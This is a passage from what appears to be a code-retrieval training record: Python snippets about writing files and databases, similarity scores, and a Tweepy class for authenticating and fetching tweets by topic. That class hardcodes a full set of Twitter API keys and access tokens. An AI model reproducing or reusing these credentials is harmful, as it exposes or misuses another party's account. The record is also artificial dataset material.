`student`;\"\n c.execute(query)\n\n for obj in obj_list:\n params = [obj.name, obj.surname, obj.email, obj.password, obj.status, obj.card, obj.team, obj.id]\n c.execute(\"INSERT INTO student (name, surname, email, password, status, card, team, student_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?)\", params)\n conn.commit()\n\n conn.close()", "def write(self, *args) -> \"int\":\n return _ida_fpro.qfile_t_write(self, *args)", "def write_to_file(entry, file):\n with open(file, \"a\") as f:\n f.write(entry)", "def file_write(self, filename, contents, append=True, create=True):\n return self._file_model.file_write(filename, contents, append=append, create=create)", "def save(self, output, data):", "def write(self):", "def write(self):", "def write_staff_to_file(cls, file_name, obj_list): # for staff\n conn = sqlite3.connect('database.db')\n c = conn.cursor()\n\n for obj in obj_list:\n if obj.status == \"mentor\":\n query = \"DELETE FROM `staff` WHERE `status` = 'mentor';\"\n c.execute(query)\n elif obj.status == \"employee\":\n query = \"DELETE FROM `staff` WHERE `status` = 'employee';\"\n c.execute(query)\n elif obj.status == \"manager\":\n query = \"DELETE FROM `staff` WHERE `status` = 'manager';\"\n c.execute(query)\n\n for index, obj in enumerate(obj_list):\n params = [obj.name, obj.surname, obj.email, obj.password, obj.status, obj.id]\n c.execute(\"INSERT INTO staff (name, surname, email, password, status, staff_id) VALUES (?, ?, ?, ?, ?, ?)\", params)\n conn.commit()\n\n conn.close()", "def write(self):\n\t\traise NotImplementedError('%s: No write function implemented!' % self.name)", "def write_res(res):\n if res is None:\n return None\n db = Database('requsts_res.sqlite3')\n curs = db.connect()\n try:\n curs.execute('''INSERT INTO content_new (url, binary_content) VALUES (?,?)''', (res.url, res._content,))\n db.conn.commit()\n except sqlite3.ProgrammingError as e:\n print('Database Error')\n print(e)\n raise e", "def write_to_databse(fileName):\n f = open(fileName)\n queries = eval(open(fileName).read())\n for q in queries:\n site.write(q)\n print \"Quries are saved:)\"", "def Save(self) -> None:\n self.__conn.commit()", "def writeto(self, fileout):\n \n dump_pkl(self.data, fileout)", "def writeDataToFile(self):\n if self.data is not None:\n self.notify.debug('Data is now synced with disk at %s' % \\\n self.filepath)\n if self.wantAnyDbm:\n self.data.sync()\n else:\n try:\n backuppath = self.filepath+ '.bu'\n if os.path.exists(self.filepath):\n os.rename(self.filepath,backuppath)\n \n outfile = open(self.filepath, 'w')\n cPickle.dump(self.data,outfile)\n outfile.close()\n \n if os.path.exists(backuppath):\n os.remove(backuppath)\n except EnvironmentError:\n self.notify.warning(str(sys.exc_info()[1]))\n else:\n self.notify.warning('No data to write. Aborting sync.')", "def fileWrite(content):\n file = open('./result.txt', 'w')\n file.write(content)\n file.close()", "def write(cls, path, text):\n with cls.open(path, 'wt') as fd:\n return fd.write(text)", "def write_file(self, stream_name:str, data:DataStream.data, file_mode:str) -> bool:\n data_path = self._get_storage_path(stream_name=stream_name)\n if isinstance(data, pd.DataFrame):\n try:\n table = pa.Table.from_pandas(data, preserve_index=False)\n pq.write_to_dataset(table, root_path=data_path, partition_cols=[\"version\", \"user\"])\n return True\n except Exception as e:\n raise Exception(\"Cannot store pandas dataframe: \"+str(e))\n else:\n try:\n data.write.partitionBy([\"version\",\"user\"]).format('parquet').mode(file_mode).save(data_path)\n return True\n except Exception as e:\n raise Exception(\"Cannot store spark dataframe: \"+str(e))", "def _write(self):\n # Reload\n with portalocker.Lock(self.filename, 'w') as fh:\n self.data.to_csv(fh, index=False)\n fh.flush()\n os.fsync(fh.fileno())", "def write_file(self):\n if self._write_file == None:\n return\n\n try:\n out = file(self._write_file, \"w\")\n except IOError, e:\n print e\n sys.exit(1)\n out.writelines(\"A cases\") \n out.close()", "def write_img_to_db():\n with lite.connect(\"test.db\") as con:\n cur = con.cursor()\n data = read_image_from_fs()\n binary = lite.Binary(data)\n cur.execute(\"INSERT INTO Images(Data) VALUES (?)\", (binary,))", "def writable(path):", "def __write_repository(self, handle, nbr):\n try:\n repository = self.database.get_repository_from_handle(handle)\n self.__write_row(nbr, handle, repository)\n except:\n repository = \"NOT FOUND\"\n self.__write_row(nbr, handle, repository)", "def _write(self, tkt_id, repo_id, changesets):\n @self.env.with_transaction()\n def do_update(db):\n cursor = db.cursor()\n value = str(changesets)\n if changesets.exists:\n if value:\n cursor.execute('UPDATE ticket_changesets SET value=%s '\n 'WHERE ticket=%s AND repository=%s',\n [value, tkt_id, repo_id])\n else:\n cursor.execute('DELETE FROM ticket_changesets '\n 'WHERE ticket=%s AND repository=%s',\n [tkt_id, repo_id])\n elif value:\n cursor.execute('INSERT INTO ticket_changesets '\n '(ticket,repository,value) VALUES(%s,%s,%s)',\n [tkt_id, repo_id, value])", "def save(self,file):\n\n with open(file,\"w\") as f:\n f.write(self.to_string())", "def _write(self, location, data):\n self._connector.write(location=location, data=data)" ]
[ "0.6699802", "0.6676422", "0.65458137", "0.6534973", "0.6344988", "0.6320584", "0.6263552", "0.62094015", "0.62065643", "0.6195185", "0.61912936", "0.61912936", "0.6186057", "0.6150113", "0.6143777", "0.6141619", "0.6129302", "0.61252534", "0.61246955", "0.61167467", "0.61080414", "0.60606027", "0.60548145", "0.603256", "0.6030213", "0.5997574", "0.5981836", "0.5960659", "0.59564465", "0.5950212", "0.5942887", "0.5933396", "0.5926967", "0.59051025", "0.5904766", "0.59023815", "0.59004253", "0.5882206", "0.5852268", "0.58408636", "0.5833231", "0.58327425", "0.5830164", "0.5815565", "0.58067083", "0.5799307", "0.57911223", "0.57779175", "0.5761322", "0.5742469", "0.5733874", "0.5727971", "0.5726819", "0.57196695", "0.5714592", "0.57061464", "0.57005787", "0.569277", "0.5689303", "0.5681548", "0.56815374", "0.56731594", "0.5672426", "0.5658898", "0.5657049", "0.565646", "0.5651614", "0.5643764", "0.5642562", "0.5640908", "0.5640908", "0.56398684", "0.56398237", "0.5638615", "0.5636588", "0.5634717", "0.56240684", "0.5623289", "0.5617745", "0.5607716", "0.5605805", "0.55990326", "0.55990326", "0.55830616", "0.5582819", "0.5582411", "0.55766857", "0.5571966", "0.557108", "0.55637884", "0.55619115", "0.556008", "0.5553425", "0.5543471", "0.55338556", "0.5532042", "0.5531678", "0.552898", "0.5524833", "0.5522308", "0.5519238" ]
0.0
-1
Authenticate, define interested topics to search, define running mode
def __init__(self, topics=None, tweet_file=None, mode='batch'): self.topics = topics # (The twitter API will only return a max of 100 count) self.GEN_MAX_TWEET = 100 # the max number of tweets to generate self.tweet_file = tweet_file self.mode = mode self.tweets = [] if topics and tweet_file: print("WARNING! you input both topics and the tweet file, only one is expected") exit(-1) if not topics and not tweet_file: print("WARNING! you input either topics or tweet file, one is expected") exit(-1) # If file argument is given, it will not connect to twitter server # It will just save tweets in self.tweets if tweet_file: with open(tweet_file, 'r') as infile: for line in infile: self.tweets.append(json.loads(line)) else: consumer_key = 'bbqKfXEU2VJNoWlYJvbdtptOE' consumer_secret = 'afPk2JuMMMD6IhP5Xijo60ni4FUK39PDzhU7ylgT9FgNZX9ngh' access_token = '434708489-DTeHfK4OYKRuIXlfoWnNgzzwpEZTPCEpSMv8C0ll' access_token_secret = 'SjWFYfX2k3q4RJKQXcP1LP9ikhRfckPKOEcrb2cpQ0A0n' # Attempt authentication try: # create OAuthHandler object self.auth = tweepy.OAuthHandler(consumer_key, consumer_secret) # set access token and secret self.auth.set_access_token(access_token, access_token_secret) # create tweepy API object to fetch tweets self.api = tweepy.API(self.auth) except: print("Error: Authentication Failed") exit(-1)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_topic_retrieval_authenticated(self):\n self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.free_token.key)\n response = self.client.get('/topics/', format='json')\n data = json.loads(response.content)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(data['count'],3)\n self.assertTrue({'name': 'Topic 1', 'description': 'The first topic.'} in data['results'])\n self.assertTrue({'name': 'Topic 2', 'description': 'The second topic.'} in data['results'])", "def topics(ctx):\n pass", "def main():\n\n config_file = 'auth_demo.cfg'\n config = ConfigParser.SafeConfigParser({\n 'username':'',\n })\n config.read(config_file)\n if not config.has_section('auth_demo_login'):\n config.add_section('auth_demo_login')\n\n username = config.get('auth_demo_login','username')\n password = None\n if username != '':\n password = keyring.get_password('auth_demo_login', username)\n\n if password == None or not auth(username, password):\n\n while 1:\n username = raw_input(\"Username:\\n\")\n password = getpass.getpass(\"Password:\\n\")\n\n if auth(username, password):\n break\n else:\n print \"Authorization failed.\"\n \n # store the username\n config.set('auth_demo_login', 'username', username)\n config.write(open(config_file, 'w'))\n\n # store the password\n keyring.set_password('auth_demo_login', username, password)\n\n # the stuff that needs authorization here\n print \"Authorization successful.\"", "def test_topic_list_view_authenticated(self):\n self.assertTrue(self.client.login(username=\"test\", password=\"test\"))\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.context[\"topics\"]), 4)", "def main()->None:\n #Define key words\n keyword_list = ['#DataScience', '#MachineLearning', '#artificialintelligence', '#AI', '#ai', '#machinelearning',\n '#deeplearning', 'DeepLearning', '#ML', '#ArtificialIntelligence', '#machinelearning',\n 'DigitalTransformation'] # track list\n\n #Initiate Time\n start_time = time.time() # grabs the system time\n print(\"Launch! \\n\")\n\n #Listen to twitter\n twitterStream = Stream(Authentification(), listener.Listener(start_time, time_limit=3600)) # initialize Stream object with a time out limit\n twitterStream.filter(track=keyword_list, languages=['en']) # call the filter method to run the Stream Object\n print('Exctraction from twitter succesful')", "def authenticate(self, username, password, consumerKey, consumerSecret):\r\n pass", "def auth():\n pass", "def auth():\n pass", "def test_single_topic_retrieval_authenticated(self):\n self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.free_token.key)\n response = self.client.get('/topic/Topic 1/', format='json')\n data = json.loads(response.content)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(data['name'],'Topic 1')\n self.assertEqual(data['description'],'The first topic.')", "def authn_and_authz():\n authentication()\n authorization()", "def auth(self):\n try:\n print(\"You are going to log in as Полигон\")\n os.system('clear')\n self.session = vk_api.VkApi(token=self.token)\n self.session._auth_token()\n print(\"authred\")\n vk = self.session.get_api()\n global authed\n self.authed = True\n print('gAut Online')\n self.longpollserver = bot_longpoll.VkBotLongPoll(self.session, 172301854)\n self.gLPS = threading.Thread(target=self.lps, args=(self.session, ), daemon=True)\n return True\n except Exception as e:\n print(e)\n pass", "def main():\t\n\t# read in short term auth\n\tf = open('./input.txt', 'r')\n\tshort_term_auth = f.read()\n\n\tlong_term_access_token = long_term_token(short_term_auth)\n\tprint(long_term_access_token)\n\tprint('run program like normal now')", "def authenticate( self ):\n\n print(\"Getting new token\")\n self.getFrob()\n self.getAuthKey()\n self.getToken()\n self.cacheToken()", "def _authenticate(self):\n\t\tfrom getpass import getpass\n\t\tpassword = getpass()\n\t\tself.msg('nickserv', 'identify %s' % password)", "def _authenticate(self):\n auth = self.settings.get(\"auth\")\n if auth:\n if auth == Auth.PLAIN:\n self._authenticate_plain()\n elif auth == Auth.SHA256_MEMORY:\n self._authenticate_sha256_memory()\n elif auth == Auth.MYSQL41:\n self._authenticate_mysql41()\n elif self.stream.is_secure():\n # Use PLAIN if no auth provided and connection is secure\n self._authenticate_plain()\n else:\n # Use MYSQL41 if connection is not secure\n try:\n self._authenticate_mysql41()\n except InterfaceError:\n pass\n else:\n return\n # Try SHA256_MEMORY if MYSQL41 fails\n try:\n self._authenticate_sha256_memory()\n except InterfaceError as err:\n raise InterfaceError(\n \"Authentication failed using MYSQL41 and \"\n \"SHA256_MEMORY, check username and \"\n f\"password or try a secure connection err:{err}\"\n ) from err", "def test_forums_search_authorized_forums(self):\n # Create two threads: one in a restricted forum and one not.\n forum1 = ForumFactory(name=u'ou812forum')\n thread1 = ThreadFactory(forum=forum1)\n PostFactory(thread=thread1, content=u'audio')\n\n forum2 = RestrictedForumFactory(name=u'restrictedkeepout')\n thread2 = ThreadFactory(forum=forum2)\n PostFactory(thread=thread2, content=u'audio restricted')\n\n self.refresh()\n\n # Do a search as an anonymous user but don't specify the\n # forums to filter on. Should only see one of the posts.\n response = self.client.get(reverse('search.advanced'), {\n 'author': '',\n 'created': '0',\n 'created_date': '',\n 'updated': '0',\n 'updated_date': '',\n 'sortby': '0',\n 'a': '1',\n 'w': '4',\n 'q': 'audio',\n 'format': 'json'\n })\n\n eq_(200, response.status_code)\n content = json.loads(response.content)\n eq_(content['total'], 1)\n\n # Do a search as an authorized user but don't specify the\n # forums to filter on. Should see both posts.\n u = UserFactory()\n g = GroupFactory()\n g.user_set.add(u)\n ct = ContentType.objects.get_for_model(forum2)\n PermissionFactory(\n codename='forums_forum.view_in_forum',\n content_type=ct,\n object_id=forum2.id,\n group=g)\n\n self.client.login(username=u.username, password='testpass')\n response = self.client.get(reverse('search.advanced'), {\n 'author': '',\n 'created': '0',\n 'created_date': '',\n 'updated': '0',\n 'updated_date': '',\n 'sortby': '0',\n 'a': '1',\n 'w': '4',\n 'q': 'audio',\n 'format': 'json'\n })\n\n # Sees both results\n eq_(200, response.status_code)\n content = json.loads(response.content)\n eq_(content['total'], 2)", "def __init__(self):\n self._predefined_cluster_topics()\n self._gatherSEs()", "def m_apiInstance_AuthenticationStatusUpdate(self, sender, e):\r\n if e.Status.IsSuccess:\r\n # Add code here to begin working with the TT API\r\n # lookup an instrument\r\n self.m_req = ttapi.InstrumentLookupSubscription(self.m_apiInstance.Session, ttapi.Dispatcher.Current, ttapi.ProductKey(ttapi.MarketKey.Cme, ttapi.ProductType.Future, \"YM\"), \"Jun17\")\r\n self.m_req.Update += self.m_req_Update\r\n print(\"Connection Success!\")\r\n self.m_req.Start()\r\n else:\r\n print(\"TT Login failed: {0}\".format(e.Status.StatusMessage))\r\n self.Dispose()", "def __init__(self, topics=None):\n self.topics = topics or []", "def topic_index():\n topic = db.topic(request.args(0)) or redirect(URL('default', 'index'))\n return dict(topic=topic)", "def authenticate(self):\n token = self.get_config('token')\n if token:\n self.root.connection.login(\n None, None, token=token, auth_type='Bearer'\n )\n else:\n config.use_sessions = True\n self.root.load_session().get()", "def authentication(): \n pathToConfig = os.path.join(prefix, \"twitterConfig\")\n config = json.load(open(pathToConfig))\n consumer_key = config['consumer_key']\n consumer_secret = config['consumer_secret']\n access_token = config['access_token']\n access_token_secret = config['access_token_secret']\n api = twitter.Api(consumer_key=consumer_key, consumer_secret=consumer_secret,\n access_token_key=access_token, access_token_secret=access_token_secret)\n return api", "def __init__(self):\n self.topics = {}", "def index_corpus(is_authenticated, is_authorized):\n if not is_authorized:\n return render_template(\"unauthorized_user.html\"), 401\n\n try:\n thread1 = threading.Thread(target=index_keyword_updater.update)\n thread1.start()\n resp = Response(json.dumps({'status':'Ingest corpus started'}), status=201, mimetype='application/json')\n except Exception as e:\n logger.error(\"ingest_corpus api is failed with error %s\" % str(e))\n return render_template(\"internal_server_error.html\"), 500\n return resp", "def help_topics():\n pass", "def authenticate(credentials):", "def auth(self):\n\n self.name = self.config[\"sname\"]\n self.numeric = self.config[\"numeric\"]\n\n passwd = self.config[\"password\"]\n\n now = int(time.time())\n\n self.send_line(\"PASS :%s\" % passwd)\n self.send_line(\"SERVER %s 1 %d %d J10 %s]]] 0 :Gravelir Services\" %\\\n (self.name, now, now, self.numeric))", "def connect(self):\n\t\tself.accept()\n\t\tquery = urllib.parse.parse_qs(self.scope['query_string'].decode())\n\t\tdummy_func(f'question = {query[\"question\"][0]}, hashtag = {query[\"hashtag\"][0]}', self)", "def test_forums_search_authorized_forums_specifying_forums(self):\n # Create two threads: one in a restricted forum and one not.\n forum1 = ForumFactory(name=u'ou812forum')\n thread1 = ThreadFactory(forum=forum1)\n PostFactory(thread=thread1, content=u'audio')\n\n forum2 = RestrictedForumFactory(name=u'restrictedkeepout')\n thread2 = ThreadFactory(forum=forum2)\n PostFactory(thread=thread2, content=u'audio restricted')\n\n self.refresh()\n\n # Do a search as an anonymous user and specify both\n # forums. Should only see the post from the unrestricted\n # forum.\n response = self.client.get(reverse('search.advanced'), {\n 'author': '',\n 'created': '0',\n 'created_date': '',\n 'updated': '0',\n 'updated_date': '',\n 'sortby': '0',\n 'forum': [forum1.id, forum2.id],\n 'a': '1',\n 'w': '4',\n 'q': 'audio',\n 'format': 'json'\n })\n\n eq_(200, response.status_code)\n content = json.loads(response.content)\n eq_(content['total'], 1)\n\n # Do a search as an authorized user and specify both\n # forums. Should see both posts.\n u = UserFactory()\n g = GroupFactory()\n g.user_set.add(u)\n ct = ContentType.objects.get_for_model(forum2)\n PermissionFactory(\n codename='forums_forum.view_in_forum',\n content_type=ct,\n object_id=forum2.id,\n group=g)\n\n self.client.login(username=u.username, password='testpass')\n response = self.client.get(reverse('search.advanced'), {\n 'author': '',\n 'created': '0',\n 'created_date': '',\n 'updated': '0',\n 'updated_date': '',\n 'sortby': '0',\n 'forum': [forum1.id, forum2.id],\n 'a': '1',\n 'w': '4',\n 'q': 'audio',\n 'format': 'json'\n })\n\n # Sees both results\n eq_(200, response.status_code)\n content = json.loads(response.content)\n eq_(content['total'], 2)", "def authenticate(self):\n # self.qobject.remove_authenticate_signal.emit()\n # self.qobject.authenticate_signal.emit( )\n #if self.app.sync_thread.status != const.STATUS_SYNC:\n # self.app.sync_thread.force_sync()\n change_auth_token( )\n self.data_changed()", "def check_and_test_auth(self):\r\n time.sleep(10)\r\n webbrowser.open(AUTH_URL)\r\n\r\n while not self.is_authorized:\r\n time.sleep(5)\r\n self.get_tokens()\r\n\r\n # Finally start our polling & refresh threads.\r\n self.start_polling_and_refresh()", "def __init__(self):\n # keys and tokens from the Twitter Dev Console\n key = provide_keys('males')\n\n consumer_key = key['consumer_key']\n consumer_secret = key['consumer_secret']\n access_token = key['access_token_key']\n access_token_secret = key['access_token_secret']\n\n # attempt authentication\n\n # create OAuthHandler object\n self.auth = OAuthHandler(consumer_key, consumer_secret)\n\n # set access token and secret\n self.auth.set_access_token(access_token, access_token_secret)\n\n try:\n # create tweepy API object to fetch tweets\n self.api = tweepy.API(self.auth)\n\n except:\n print(\"Error: Authentication Failed\")\n sys.exit(-1)", "def authenticate():\n auth = OAuthHandler(config.TW_API_KEY, config.TW_API_SECRET)\n auth.set_access_token(config.TW_ACC_TOKEN, config.TW_ACC_SECRET)\n\n return auth", "def __init__(self, topic: str, credentials: Tuple[str, str]) -> None:\n self.topic = topic\n self.credentials = credentials", "def check_auth():", "def topics_from_user_input(self):\n\n getting_name = True\n\n print(\"\\nPlease enter username and press enter:\\n\")\n\n while getting_name:\n username = input()\n\n redditor = self(username)\n\n if not redditor.username:\n print(\"Redditor does not exist. Please enter again.\\n\")\n continue\n\n break\n\n redditor.print_topics()", "def learn_topic_model_activities(self):\n print \"\\nLearning a topic model with LDA:\"\n\n doc_topic, topic_word = tm.run_topic_model(self.accu_path, self.config['lda'])\n\n tm.dump_lda_output(self.lda_path, doc_topic, topic_word)\n print \"Topic Modelling - done.\\n\"\n return True", "async def initialize(self):\r\n self.access_token = await async_get_value(SPOTIFY_ACCESS_TOKEN)\r\n self.refresh_token = await async_get_value(SPOTIFY_REFRESH_TOKEN)\r\n self.should_poll = await async_get_value(SPOTIFY_SHOULD_POLL)\r\n request_code = self.get_currently_playing().status_code\r\n if request_code == requests.codes.ok or request_code == requests.codes.no_content:\r\n self.start_polling_and_refresh()\r\n return\r\n\r\n # Go through the oauth flow.\r\n self.auth_thread = StoppableThread(target=self.check_and_test_auth)\r\n self.auth_thread.start()\r\n return", "def authenticate(self):\n expires = int(time.time())\n method = \"GET\"\n path = \"/realtime\"\n msg = method + path + str(expires)\n signature = hmac.new(\n self.secret, msg.encode(), digestmod=hashlib.sha256\n ).hexdigest()\n\n req = {\"op\": \"authKey\", \"args\": [self.key, expires, signature]}\n self.send_packet(req)", "def __init__(self, topic):\n self.topic = topic", "def keep_alive(now):\n api.authenticate()\n _LOGGER.info(\"Authenticate against iCloud\")", "def main(keywords_file):\n try:\n # prepare credentials for accessing twitter API\n consumer_key = os.environ.get('CONSUMER_KEY')\n consumer_secret = os.environ.get('CONSUMER_SECRET')\n access_token = os.environ.get('ACCESS_TOKEN')\n access_token_secret = os.environ.get('ACCESS_TOKEN_SECRET')\n\n if (consumer_key is None or consumer_secret is None or\n access_token is None or access_token_secret is None):\n raise EnvironmentError('Missing twitter API credentials.')\n api = auth(consumer_key=consumer_key,\n consumer_secret=consumer_secret,\n access_token=access_token,\n access_token_secret=access_token_secret)\n\n db_name = os.environ.get('DB_NAME')\n if db_name is None:\n raise EnvironmentError('Database name is missing in evn file.')\n client = pymongo.MongoClient(host='localhost', port=27017,\n appname=__file__)\n db = client[db_name]\n filepath = os.path.basename(keywords_file)\n input_filename, _ = os.path.splitext(filepath)\n collection = db[input_filename]\n\n twitterStreamListener = TwitterStreamListener(collection=collection)\n twitterStream = tweepy.Stream(auth=api.auth,\n listener=twitterStreamListener)\n\n keywords = read_keywords_file(filename=keywords_file)\n logger.info('Streamer App has started listening for keywords: '\n f'{\", \".join(keywords)}')\n twitterStream.filter(track=keywords, is_async=True)\n except requests.exceptions.HTTPError as e:\n logger.error(\"Checking internet connection failed, \"\n f\"status code {e.response.status_code}\")\n except requests.exceptions.ConnectionError:\n logger.error(\"Could not establish a connection.\")\n except (ValueError, TypeError, TweepError, KeyError,\n EnvironmentError) as e:\n logger.error(e)\n except KeyboardInterrupt:\n logger.info('Program interrupted by user. ')", "def authentication_hook(self):\n pass", "def authenticate(self):\n auth = tw.OAuthHandler(self.consumer_key, self.consumer_secret)\n auth.set_access_token(self.access_token, self.access_secret)\n return tw.API(auth)", "def auth(request):\n response_status_code = status.HTTP_403_FORBIDDEN\n\n try:\n ServiceToken.objects.get(service__identifier=request.POST.get('username'), service__is_active=True,\n key=request.POST.get('password'))\n\n response_status_code = status.HTTP_200_OK\n except ServiceToken.DoesNotExist:\n pass\n\n logger.info('MQTT authentication for service \"{}\" {}'.format(\n request.POST.get('username'), 'succeeded' if response_status_code == status.HTTP_200_OK else 'failed'))\n\n return HttpResponse(status=response_status_code)", "def test_topic_retrieval_unauthenticated(self):\n response = self.client.get('/topics/', format='json')\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)", "def start_flow(consumer_key, consumer_secret_key,\n access_token, access_secret_token,\n languages, track, locations, data_base):\n\n logger.info('Initializing listener')\n # Instantiate listener\n l = StdoutListener(data_base)\n\n logger.info('Authorization')\n auth = OAuthHandler(consumer_key, consumer_secret_key)\n auth.set_access_token(access_token, access_secret_token)\n\n # Start data stream\n logger.info('Beginning streaming')\n stream = Stream(auth, l)\n stream.filter(track=track,\n languages=languages,\n locations=locations)", "def authenticate(self):\n self.connection.authenticate()", "def topic(cls, **kwargs) -> str:\n return \"hermes/asr/startListening\"", "def auth(self):\n ok = False\n if self.private_token:\n ok = self.token_auth()\n if not ok:\n self.credentials_auth()", "def _authenticate(self):\n if self.creds().consumer_key() is None or \\\n self.creds().app_secret() is None:\n self.logger.error(\"You need a consumer key and app secret, yo\")\n else:\n self._access_token = self._request_access_token()", "def __init__(self, addr, port, auth_info=None, base_topic=\"\"):\n self._addr = addr\n self._port = port\n self._connected = False\n self._client = mqtt.Client(client_id=\"\", clean_session=True, userdata=None, protocol=mqtt.MQTTv311)\n self._client.on_message = self.on_messagge\n self._callbacks = {}\n if auth_info is not None:\n self._client.username_pw_set(auth_info[\"user\"], auth_info[\"password\"])\n self._base_topic = base_topic", "def __init__(self, session = None) -> None:\n self.session = session or ClientSession()\n self._topics = { # {key: placeholder}\n 'capital': 'Capital City',\n 'region': 'Region',\n 'subregion': 'Sub-region',\n 'population': 'Sub-region',\n 'demonym': 'Demonym',\n 'nativeName': 'Native name'\n }", "def login():\n print (\"Welcome to ExpressTruthNow! To access twitter, please enter \" + \n \"the path of the information login file. (use '/' in path!)\")\n\n path = (folderlink + \"/info.txt\")\n key = returninfo(path, \"API\") # API Key\n secret = returninfo(path, \"SECRET\") # API authentication\n access = returninfo(path, \"ACCESS\") # Request Key\n secaccess = returninfo(path, \"SECACCESS\") # Request authentication\n\n auth = tweepy.OAuthHandler(key, secret) \n auth.set_access_token(access, secaccess)\n\n print \"Login Successful.\"\n \n return(tweepy.API(auth))", "def apply_auth():\n\tclient = BaiduOpenApi()\n\tapi = client.device.code\n\tresp = client.device.code.get(response_type=\"device_code\", scope=\"netdisk\")\n\t# open grant page and wait for user confirm\n\twebbrowser.open_new_tab(r\"http://openapi.baidu.com/device?code=%s\"%resp[\"user_code\"])\n\t# yield to main\n\tyield\n\t# main will tell user to confirm and it will take a while\n\t# polling to wait server back\n\tpolling_tokens(resp[\"device_code\"], resp[\"interval\"], resp[\"expires_in\"])", "def t_auth():\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, token_secret)\n return tweepy.API(auth)", "def main() -> None:\n\n logger.info(f\"Arguments: {args}\")\n client = iotcore.Client()\n client.subscribe(args.request_topic, iotcore.QOS.AT_MOST_ONCE, handler)\n\n while True:\n # Keep app open and running\n time.sleep(1)", "def authenticate():\n print('Authenticating...\\n')\n authentication = praw.Reddit(site_name=config['BOT_NAME'], user_agent=config['USER_AGENT'])\n print(f'Authenticated as {authentication.user.me()}\\n')\n return authentication", "def is_session_in_topic(cls) -> bool:\n return True", "def authorization():\n pass", "def listen(self, topics):\n logging.debug(f'Listen to {list(map(lambda x: x.name, topics))}')\n\n for topic in map(lambda x: x.name, topics):\n try:\n self.subscribe(topic)\n logging.debug(f'Subscribed the {topic} topic')\n except Exception:\n logging.debug(f\"Can't subscribe the {topic} topic\")", "def start(update: Update, context: CallbackContext):\n # Prompt for topic\n update.message.reply_text(f'Choose a topic!', reply_markup = ReplyKeyboardMarkup(keyboard = [[topic] for topic in context.bot_data['quiz']], resize_keyboard = True, one_time_keyboard = True))\n\n return CHOOSE_A_TOPIC", "def run(config, logging, inq, subscribe_callback, unsubscribe_callback):", "def authenticate(self, username, password, consumerKey, consumerSecret):\r\n self.send_authenticate(username, password, consumerKey, consumerSecret)\r\n return self.recv_authenticate()", "def requestTopics(self):\n self.port.flushInput()\n # request topic sync\n self.port.write(\"\\xff\\xff\\x00\\x00\\x00\\x00\\xff\")", "def consume(userid:str, token:str, registry=None):", "def auth(self):\n return self.api(self.token)", "def start_mqtt_auth_watcher(run_event):\n print('START MQTT WATCHER')\n cmd = ['/app/src/mosquitto_watcher.sh']\n # , cwd=os.path.join(os.path.dirname(__file__))\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)\n while run_event.is_set():\n time.sleep(1)\n process.terminate()\n process.wait()", "def configurations(corpus, search, **kwargs):\n\n from corpkit.dictionaries.wordlists import wordlists\n from corpkit.dictionaries.roles import roles\n from corpkit.interrogation import Interrodict\n from corpkit.interrogator import interrogator\n from collections import OrderedDict\n\n if search.get('l') and search.get('w'):\n raise ValueError('Search only for a word or a lemma, not both.')\n\n # are we searching words or lemmata?\n if search.get('l'):\n dep_word_or_lemma = 'dl'\n gov_word_or_lemma = 'gl'\n word_or_token = search.get('l')\n else:\n if search.get('w'):\n dep_word_or_lemma = 'd'\n gov_word_or_lemma = 'g'\n word_or_token = search.get('w')\n\n # make nested query dicts for each semantic role\n queries = {'participant': \n\n {'left_participant_in': \n {dep_word_or_lemma: word_or_token,\n 'df': roles.participant1,\n 'f': roles.event},\n\n 'right_participant_in':\n {dep_word_or_lemma: word_or_token,\n 'df': roles.participant2,\n 'f': roles.event},\n\n 'premodified':\n {'f': roles.premodifier, \n gov_word_or_lemma: word_or_token},\n\n 'postmodified':\n {'f': roles.postmodifier, \n gov_word_or_lemma: word_or_token},\n\n 'and_or':\n {'f': 'conj:(?:and|or)',\n 'gf': roles.participant,\n gov_word_or_lemma: word_or_token},\n },\n\n 'process':\n\n {'has_subject':\n {'f': roles.participant1,\n gov_word_or_lemma: word_or_token},\n\n 'has_object':\n {'f': roles.participant2,\n gov_word_or_lemma: word_or_token},\n\n 'modalised_by':\n {'f': r'aux',\n 'w': wordlists.modals,\n gov_word_or_lemma: word_or_token},\n\n 'modulated_by':\n {'f': 'advmod',\n 'gf': roles.event,\n gov_word_or_lemma: word_or_token},\n\n 'and_or':\n {'f': 'conj:(?:and|or)',\n 'gf': roles.event, \n gov_word_or_lemma: word_or_token},\n \n },\n\n 'modifier':\n\n {'modifies':\n {'df': roles.modifier,\n dep_word_or_lemma: word_or_token},\n\n 'modulated_by':\n {'f': 'advmod',\n 'gf': roles.modifier,\n gov_word_or_lemma: word_or_token},\n\n 'and_or':\n {'f': 'conj:(?:and|or)',\n 'gf': roles.modifier,\n gov_word_or_lemma: word_or_token},\n\n }\n }\n\n # allow passing in of single function\n if search.get('f'):\n if search.get('f').lower().startswith('part'):\n queries = queries['participant']\n elif search.get('f').lower().startswith('proc'):\n queries = queries['process']\n elif search.get('f').lower().startswith('mod'):\n queries = queries['modifier']\n else:\n newqueries = {}\n for k, v in queries.items():\n for name, pattern in v.items():\n newqueries[name] = pattern\n queries = newqueries\n queries['and_or'] = {'f': 'conj:(?:and|or)', gov_word_or_lemma: word_or_token}\n\n # count all queries to be done\n # total_queries = 0\n # for k, v in queries.items():\n # total_queries += len(v)\n \n kwargs['search'] = queries\n \n # do interrogation\n data = corpus.interrogate(**kwargs)\n \n # remove result itself\n # not ideal, but it's much more impressive this way.\n if isinstance(data, Interrodict):\n for k, v in data.items():\n v.results = v.results.drop(word_or_token, axis=1, errors='ignore')\n v.totals = v.results.sum(axis=1)\n data[k] = v\n return Interrodict(data)\n else:\n return data", "def authd(self, xmlstream):\n\t\tprint \"authenticated\"\n\t\t\n\t\tpresence = domish.Element(('jabber:client', 'presence'))\n\t\tpresence.addElement('status').addContent('Online')\n\t\txmlstream.send(presence)\n\n\t\t#xmlstream.addObserver('/message', 